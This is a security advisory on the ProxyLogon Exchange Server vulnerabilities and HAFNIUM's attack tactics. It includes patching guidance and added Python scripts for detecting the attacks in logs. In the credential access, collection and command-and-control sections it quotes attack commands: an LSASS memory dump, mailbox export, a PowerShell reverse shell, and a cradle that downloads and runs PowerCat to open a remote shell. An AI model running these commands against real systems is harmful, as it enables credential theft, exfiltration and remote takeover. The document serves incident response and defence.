CVE-2021-26855 - Vulnerable Exchange Server

Description

The Exchange server is Microsoft's email, calendaring, contact, scheduling and collaboration platform that runs exclusively on the Microsoft Windows server operating system.  The Exchange server primarily uses a proprietary protocol called Messaging Application Programming Interface (MAPI) to talk to email clients.  Support for Post Office Protocol version 3 (POP3), Internet Message Access Protocol (IMAP) and Exchange ActiveSync (EAS) protocols was subsequently added.  The Simple Mail Transfer Protocol (SMTP) is used to communicate to other internet mail servers.

Problem

In January 2021, the US-based security firm Volexity, which assists organisations with incident response, digital forensics and threat intelligence services, detected anomalous activity from two (2) of its customers' Exchange servers through its network security monitoring service.  A large amount of data was identified being sent to IP addresses not tied to legitimate users.  Inspection of the Internet Information Services (IIS) logs from the Exchange servers revealed inbound POST requests to valid files associated with images, JavaScript, cascading style sheets and fonts used by the browser-based application Outlook Web Access (OWA).  OWA allows a user to access email, calendars, tasks and contacts from an on-premise Exchange server.  On the 02nd Mar 2021, the Microsoft Security Response Center (MSRC) publicly disclosed Common Vulnerabilities and Exposures (CVE) report CVE-2021-26855.  Volexity reported they had first observed the exploit on the 03rd Jan 2021.  Microsoft attributed the activity to the Advanced Persistent Threat (APT) group 'HAFNIUM'.  Three (3) further CVE reports related to the Exchange server and to CVE-2021-26855 were publicly disclosed on the same date.

Systems used for reporting and assessing the severity of security vulnerabilities

No. System Description
1. Common Vulnerabilities and Exposures (CVE). The CVE system is used to identify, define, catalogue and publicly disclose known information-security vulnerabilities and exposures.
2. Common Vulnerability Scoring System (CVSS). CVSS is a free and open industry standard for assessing the severity of computer system security vulnerabilities.  It provides a numerical (0-10) representation of the severity of an information security vulnerability.

Microsoft Exchange Server Security Vulnerability - CVE Reports & CVSS Metrics

No. CVE Report CVSS Metrics Exchange Server Version Affected Date Disclosed
1. CVE-2021-26855 9.1 Exchange Server 2010, 2013, 2016, 2019 02 Mar 2021
2. CVE-2021-26857 6.8 Exchange Server 2010, 2013, 2016, 2019 02 Mar 2021
3. CVE-2021-26858 7.8 / 7.2 Exchange Server 2010, 2013, 2016, 2019 02 Mar 2021
4. CVE-2021-27065 7.8 Exchange Server 2010, 2013, 2016, 2019 02 Mar 2021

CVE-2021-26855: This is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange Server.

CVE-2021-26857: This is an insecure deserialisation vulnerability in the Unified Messaging (UM) service. Insecure deserialisation is where untrusted user-controllable data is deserialised by a program.  Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server.  This requires administrator permission or another vulnerability to exploit.

CVE-2021-26858: This is a post-authentication arbitrary file write vulnerability in Exchange.  If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server.  They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin's credentials.

CVE-2021-27065: This is a post-authentication arbitrary file write vulnerability in Exchange.  If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server.  They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin's credentials.

Note to CVE-2021-26857:
The Unified Messaging (UM) service combines voice messaging and email messaging into one mailbox that can be accessed from many different devices.

Tactics, Techniques and Procedures

The following Tactics, Techniques and Procedures were employed by the APT group 'HAFNIUM', responsible for the exploitation of the four (4) CVEs discovered in the Microsoft Exchange server and publicly disclosed on the 02nd Mar 2021.

Reconnaissance

All systems targeted and compromised in the attack were on-premise Exchange servers.  Prior to the initial access, active or passive scanning would have been conducted on targeted networks seeking to identify on-premise Exchange servers with web services accessible to the public internet.  The fully qualified domain name (FQDN) of an on-premise Exchange server had to be identified as a prerequisite to an attack.   This information could be extracted from knowledge of the external IP address or domain name of the publicly accessible Exchange server.  Lists of e-mail addresses of intended targets were also collected.

Resource Development

The operation and attack on the Exchange servers were primarily conducted from leased virtual private servers (VPS) in the United States.  A range of free and commercial exploit tools were used to compromise the Exchange servers and to perform unauthorised activities.

List of IP addresses used in the attack on Exchange servers.

These IP addresses are tied to the virtual private servers (VPS) and virtual private networks (VPNs) from which the operation was conducted.


List of software tools used in the exploitation of Exchange servers

No. Method / Tool Purpose
1. Covenant This is an ASP.NET Core cross-platform application that includes a web-based interface that allows for multi-user collaboration.  Used as a command and control (C2) platform for the attack on vulnerable on-premise Exchange servers.
2. Exchange Snap-ins Exchange PowerShell snap-ins were used to export data in mailboxes.  A snap-in is a binary file, e.g. a DLL, that contains new cmdlets.  Snap-ins are a mechanism to extend the set of commands available within a PowerShell session, script or function.
3. Nishang This is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing.  Useful during all phases of penetration testing.
4. PowerCat This is an open-source powershell script that can read and write data across network connections.
5. ProcDump This is a command-line utility, and part of the Microsoft Sysinternals suite.  It was used to dump the memory of a process.
6. PsExec This is a command-line utility, and part of the Microsoft Sysinternals PsTools suite.  It was used to execute commands on remote systems and to either download or upload a file over a network share.
7. 7-Zip This is a free and open-source file archiver utility which was used to compress data that was to be exfiltrated.
8. WinRAR This Microsoft Windows file archiver utility was used to compress data prior to exfiltration.

Initial Access

Initial access was through the server-side request forgery (SSRF) vulnerability in the on-premise Exchange server.  Specially crafted HTTP POST requests carrying an Extensible Markup Language (XML) Simple Object Access Protocol (SOAP) payload were sent to the Exchange server, addressed to the Exchange Web Services (EWS) Application Programming Interface (API) endpoint.  The SOAP request, using specially crafted cookies, bypassed authentication, and the underlying request specified in the XML was ultimately executed, allowing any operation to be performed on the users' mailbox.  The HTTP POST requests targeted files found in the folder:

/owa/auth/Current/themes/resources

Contained in this folder are image, font and cascading style sheet files.  Use of any of these files as the target of the HTTP POST request appears to allow the exploit to proceed.

Files that were targets of HTTP POST requests.

No. File
1. /owa/auth/Current/themes/resources/logon.css
2. /owa/auth/Current/themes/resources/owafont_ja.css
3. /owa/auth/Current/themes/resources/lgnbotl.gif
4. /owa/auth/Current/themes/resources/owafont_ko.css
5. /owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot
6. /owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf
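The IIS log pattern described above (POST requests to static files under /owa/auth/Current/themes/resources, which a browser only ever fetches with GET) can be hunted for with a short log parser.  This is an added example and not part of the original report or Microsoft's tooling; SAMPLE_LOG is constructed in IIS W3C extended format and the client IPs are documentation-range placeholders, not indicators from the report.

```python
"""Hunt IIS W3C logs for POST requests to static OWA theme resources.

Added example, not from the original report.  SAMPLE_LOG is constructed
to resemble IIS W3C extended logging; the client IPs are documentation-
range placeholders, not indicators from the report.
"""
import re

# Browsers only GET these static files; a POST to one of them is anomalous
# for static content and is the request pattern described in the report.
RESOURCE_PREFIX = "/owa/auth/current/themes/resources/"
STATIC_EXT = (".css", ".gif", ".png", ".js", ".eot", ".ttf", ".woff")
FIELDS_RE = re.compile(r"^#Fields:\s*(.+)$")

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-03-02 10:15:01 10.0.0.5 GET /owa/auth/Current/themes/resources/logon.css - 443 - 192.0.2.10 Mozilla/5.0 200
2021-03-02 10:15:07 10.0.0.5 POST /owa/auth/Current/themes/resources/logon.css - 443 - 198.51.100.23 python-requests/2.25 200
2021-03-02 10:15:09 10.0.0.5 POST /owa/auth/Current/themes/resources/lgnbotl.gif - 443 - 198.51.100.23 python-requests/2.25 200
2021-03-02 10:16:44 10.0.0.5 POST /ews/exchange.asmx - 443 jsmith 192.0.2.11 Microsoft-Outlook 200
2021-03-02 10:17:02 10.0.0.5 GET /owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot - 443 - 192.0.2.10 Mozilla/5.0 200
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#"):
            m = FIELDS_RE.match(raw)
            if m:
                fields = m.group(1).split()   # a new #Fields line resets the layout
            continue
        if not fields or not raw.strip():
            continue
        parts = raw.split(" ")
        if len(parts) != len(fields):
            continue                          # malformed line: skip, don't misalign
        yield dict(zip(fields, parts))


def is_suspicious(entry):
    """True for a POST whose URI is a static file under the OWA theme resources folder."""
    stem = entry.get("cs-uri-stem", "").lower()
    return (entry.get("cs-method") == "POST"
            and stem.startswith(RESOURCE_PREFIX)
            and stem.endswith(STATIC_EXT))


def find_suspicious_posts(text):
    """Return (timestamp, client IP, URI) for every suspicious POST in the log text."""
    return [(f"{e['date']} {e['time']}", e["c-ip"], e["cs-uri-stem"])
            for e in parse_w3c(text) if is_suspicious(e)]


if __name__ == "__main__":
    for ts, ip, uri in find_suspicious_posts(SAMPLE_LOG):
        print(f"{ts}  {ip}  POST {uri}")
```

The legitimate GET requests to the same files and the authenticated POST to the EWS endpoint are not flagged; only the two POSTs to static theme resources are.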

Execution

Access to the Exchange server was through the server-side request forgery (SSRF) vulnerability (CVE-2021-26855).  The NT AUTHORITY\SYSTEM account was used to create files on the Exchange server (CVE-2021-26857).  CVE-2021-26858 and CVE-2021-27065 were exploited for post-authentication arbitrary file write operations.  The compromise of the on-premise Exchange server enabled access to the e-mail accounts from which data was stolen and the installation of additional malware.

Web Shells

Web shells (ASPX files) were installed on the Exchange server and used to execute malicious code via the Command Prompt (CMD.exe) and Microsoft Windows Command Shell.

Purposes for which Web shells were used in the attack on Exchange servers.

No. Purpose
1. To harvest and exfiltrate sensitive data and credentials.
2. To upload additional malware, with the potential of creating, e.g., a watering hole for infection and scanning of further victims.
3. To use as a relay point to issue commands to hosts within the network without direct internet access.
4. To use as a command and control infrastructure, potentially in the form of a bot in a botnet or in support of compromises to additional external networks.  This may occur in the event that the threat actor intends to establish persistence on the target.

SHA256 Hashes of Web shells used in the attack on Exchange servers.


Persistence

To establish and maintain a persistent presence or foothold on the Microsoft Exchange servers, web shells (ASPX files), malware and backdoors were used.

Web shells deployed to maintain a persistent presence on a Microsoft Exchange server.

No. Name Function
1. SIMPLESEESHARP This is a simple ASPX web shell used to write additional files to disk e.g. SPORTSBALL web shell.
2. SPORTSBALL This is an extensive web shell used to upload files and execute commands on the system.
3. China Chopper This is a web shell that provides access back into the system.  It is used by several Advanced Persistent Threat (APT) Groups.
4. ASPXSpy This is a publicly available web shell used by several Advanced Persistent Threat (APT) Groups as a backdoor payload. It may be used to fetch, install and execute additional malware payloads on an infected Microsoft Exchange server.

Defence Evasion

Web shells deployed on the Microsoft Exchange servers had names that were identical or similar to those of legitimate files.

Names of web shells detected

No. Name
1. web.aspx
2. help.aspx
3. document.aspx
4. errorEE.aspx
5. errorEEE.aspx
6. errorEW.aspx
7. errorFF.aspx
8. healthcheck.aspx
9. aspnet_www.aspx
10. aspnet_client.aspx
11. xx.aspx
12. shell.aspx
13. aspnet_iisstart.aspx
14. one.aspx

Credential Access

The command line utility ProcDump was used to dump the process memory of the Local Security Authority Subsystem Service (LSASS), from which credentials were acquired.  Web shells were used to create copies of the NTDS.dit (NT Directory Services) file that were then exfiltrated from the Microsoft servers.

Operating System Credential Dumping

No. Name Description
1. LSASS Memory The Local Security Authority Subsystem Service is a process in Microsoft operating systems that is responsible for enforcing the security policy on the system.  LSASS stores in memory the credentials of users that are currently logged in to the network.  This allows users seamless access to network resources without having to re-enter their credentials.
2. NTDS.dit The NTDS.dit (NT Directory Services) file is a database that stores the Windows Active Directory data including information about user objects, groups and group membership.  It includes the password hashes for all users in the domain.  The file is stored on the domain controllers.

Following the deployment of web shell scripts, the threat actors performed the following post-exploitation activity: the ProcDump command below was used to dump the LSASS process memory.

C:\windows\temp\procdump64 -accepteula -ma lsass.exe C:\windows\temp\lsass

Microsoft advised customers to monitor the following folders for LSASS dumps.

LSASS dumps

No. Folder
1. C:\windows\temp\
2. C:\root\

Lateral Movement

The command-line tool PsExec was used to execute processes on remote systems, using network shares and valid accounts.

Collection

The file archiver utilities WinRAR and 7-Zip were used to compress data that was to be exfiltrated.  Microsoft Exchange PowerShell snap-ins were used to export data contained in mailboxes.

The following 7-Zip command was used to compress data into ZIP files for exfiltration.

c:\ProgramData\7z a -t7z -r c:\ProgramData\it.zip c:\ProgramData\pst

Microsoft advised customers to monitor the following folder for suspicious .zip, .rar and .7z files, which may indicate possible data exfiltration.

ZIP files

No. Folder
1. C:\ProgramData\

Exchange PowerShell snap-ins were added and used to export data contained in mailboxes.

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;Get-Mailbox
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;Get-MailboxExportRequest -ResultSize 100
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;Get-MailboxExportRequest|Remove-MailboxExportRequest -Confirm:$false

Command and Control

The legitimate open-source framework Covenant was used for Command and Control.  Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration.  ASCII encoding was used for C2 traffic.

Open source PowerShell scripts or tools were downloaded from the internet and used to establish a reverse shell connection from the compromised Exchange server to the C2 platform or to establish a connection to a remote server.

The PowerShell Nishang Framework

Nishang is a framework and collection of scripts and payloads which enables the usage of PowerShell for offensive security, penetration testing and red teaming.

Nishang was used to open a reverse shell.

powershell -nop -c "$client = New-Object Net.Sockets.TCPClient(XXXXXXXXXXX);$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

PowerCat

PowerCat is an open source powershell script that brings the functionality and power of the computer networking utility Netcat to Microsoft Windows.  Traditional anti-virus solutions may be unable to detect PowerCat.

PowerCat was used to open a connection to a remote server, after it had been downloaded from the internet.

IEX (New-Object System.Net.Webclient).DownloadString ('https://raw.githubusercontent.com/besimmorhino/pwercat/master/powercat.ps1');
powercat -c XXXXXXXXXXX -p XXXXXXXX -e powershell
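The commands quoted in the Credential Access, Collection and Command and Control sections above share recognisable command-line markers (ProcDump with -ma lsass, 7z archiving into C:\ProgramData, the Exchange snap-in with mailbox export cmdlets, the Net.Sockets.TCPClient reverse shell, the IEX/DownloadString cradle and PowerCat).  As an added example that is not part of the original report or Microsoft's guidance, the following rules classify process-creation command lines against those markers; SAMPLE_EVENTS is constructed telemetry with redacted placeholders, not real data.

```python
"""Classify process command lines against the post-exploitation commands
observed in this report: ProcDump LSASS dump, 7-Zip staging in ProgramData,
Exchange snap-in mailbox export, PowerShell TCP reverse shell, download
cradle and PowerCat.

Added example, not from the original report or Microsoft's guidance.
SAMPLE_EVENTS is constructed process-creation telemetry; hosts and ports
are redacted placeholders.
"""
import re

# (label, pattern) pairs; patterns are searched case-insensitively over the
# whole command line and mirror the commands quoted in the report.
RULES = [
    ("credential-access/lsass-dump",
     re.compile(r"procdump(64)?(\.exe)?\b.*\s-ma\s+lsass", re.I | re.S)),
    ("collection/archive-staging",
     re.compile(r"\b7z(\.exe)?\s+a\b.*\\programdata\\", re.I | re.S)),
    ("collection/mailbox-export",
     re.compile(r"add-pssnapin\s+microsoft\.exchange\.management\.powershell\.snapin"
                r".*(get-mailbox|mailboxexportrequest)", re.I | re.S)),
    ("command-and-control/powershell-reverse-shell",
     re.compile(r"net\.sockets\.tcpclient.*getstream\(\)", re.I | re.S)),
    ("command-and-control/download-cradle",
     re.compile(r"\biex\b.*downloadstring|downloadstring.*\biex\b", re.I | re.S)),
    ("command-and-control/powercat",
     re.compile(r"\bpowercat\s+-c\b", re.I)),
]

SAMPLE_EVENTS = [  # (event id, command line); constructed, not real telemetry
    (1001, r"C:\windows\temp\procdump64 -accepteula -ma lsass.exe C:\windows\temp\lsass"),
    (1002, r"c:\ProgramData\7z a -t7z -r c:\ProgramData\it.zip c:\ProgramData\pst"),
    (1003, "powershell Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;"
           "Get-MailboxExportRequest -ResultSize 100"),
    (1004, "powershell -nop -c \"$client = New-Object Net.Sockets.TCPClient('<redacted>');"
           "$stream = $client.GetStream();\""),
    (1005, "powershell IEX (New-Object System.Net.WebClient).DownloadString('<redacted>');"
           "powercat -c <redacted> -p <redacted> -e powershell"),
    (1006, r"C:\Windows\System32\cmd.exe /c dir C:\ProgramData"),  # benign
]


def classify(cmdline):
    """Return the label of every rule that matches the command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def triage(events):
    """Map event id -> matched labels for every event matching at least one rule."""
    hits = {}
    for event_id, cmdline in events:
        labels = classify(cmdline)
        if labels:
            hits[event_id] = labels
    return hits


if __name__ == "__main__":
    for event_id, labels in triage(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(labels))
```

Feed real command lines from Windows Security event 4688 or Sysmon event 1 into triage(); the benign cmd.exe event shows that a plain directory listing of C:\ProgramData does not trigger the archive rule.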

Exfiltration

The collected and compressed data was exfiltrated to cloud service providers offering secure, user-controlled, end-to-end encrypted cloud storage and communications services, such as the New Zealand based company MEGA Limited.

Solution

Apply all software patches released by the Microsoft Corporation in response to the four (4) Common Vulnerabilities and Exposures discovered in the Microsoft Exchange server that were publicly disclosed on the 02nd Mar 2021.

Mitigation tools made available by Microsoft.

No. Script Function
1. Test-ProxyLogon.ps1 This script scans the log files of an Exchange server for IoCs.  Constituents are advised to run this script to establish if their Exchange servers were compromised.
2. Exchange On-premises Mitigation Tool (EOMT) This script contains mitigations that will help address CVE-2021-26855.  This is the most effective way to protect and mitigate an Exchange server prior to patching.

Final list of security updates required for the Exchange server.

No. Server List of Security Updates Required
1. Exchange 2010 (End of Life - Oct 2020) SP3 or any SP3 RU (This is a Defence in Depth update)
2. Exchange 2013 SP1, CU21, CU22, CU23
3. Exchange 2016 CU8, CU9, CU10, CU11, CU12, CU13, CU14, CU15, CU16, CU17, CU19 or CU18
4. Exchange 2019 RTM, CU1, CU2, CU3, CU4, CU5, CU6, CU8 or CU7

List of Abbreviations

CU      :Cumulative Update.
RTM     :Real Time Monitoring.
RU      :Update Rollup.
SP      :Service Pack.
SU      :Security Updates.

Knowledge Base Articles on Service Pack 3 and Cumulative Updates.

No. Exchange Version Knowledge Base Articles on Update
1. Exchange 2010 - Service Pack 3 KB5000978
2. Exchange 2013 - Cumulative Update 23 KB5000871
3. Exchange 2016 - Cumulative Update 18 KB5000871
4. Exchange 2016 - Cumulative Update 19 KB5000871
5. Exchange 2019 - Cumulative Update 7 KB5000871
6. Exchange 2019 - Cumulative Update 8 KB5000871

Note: Installing a later Cumulative Update (CU) after installing the Security Updates (SU) will make the Exchange server vulnerable to exploits again until such time as the Cumulative Update (CU) installed contains the March 2021 security fixes (Exchange 2016 CU20 and Exchange 2019 CU9, and newer, include the March 2021 Security Updates).

Chart from Microsoft illustrating three paths for applying Exchange updates (image "Updates Path" not reproduced here).

Additional Information

Microsoft - Exchange Server Security Updates - 02 March 2021
Microsoft - Exchange Server Security Updates for older Cumulative Updates of Exchange Server - 08 March 2021
Microsoft - Upgrade Exchange to the latest Cumulative Update
Microsoft Security - HAFNIUM targeting Exchange Servers with 0-day exploits - 02 March 2021
Microsoft Security Response Center - Microsoft Exchange Server - updated 15 March 2021
Microsoft Security Response Center - Guidance for responders: 16 March 2021
Microsoft Security Response Center - On Premises Exchange Server - updated 25 March 2021
Microsoft Exchange Server Build Numbers and Release Dates
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
Volexity Blog - Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities
PICUS - Tactics, Techniques and Procedures (TTPs) Used by HAFNIUM to Target Microsoft Exchange Servers.
MANDIANT - Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities
US-CERT - Mitigate Microsoft Exchange Server Vulnerabilities
GovCERT.ch - Exchange Vulnerability 2021
Tenable Blog
Everything you need to know about the Microsoft Exchange Server hack
PsExec Explainer by Mark Russinovich
Introduction - PsTools Documentation by Mark Russinovich
Hunting Malware with Windows Sysinternals - Process Explorer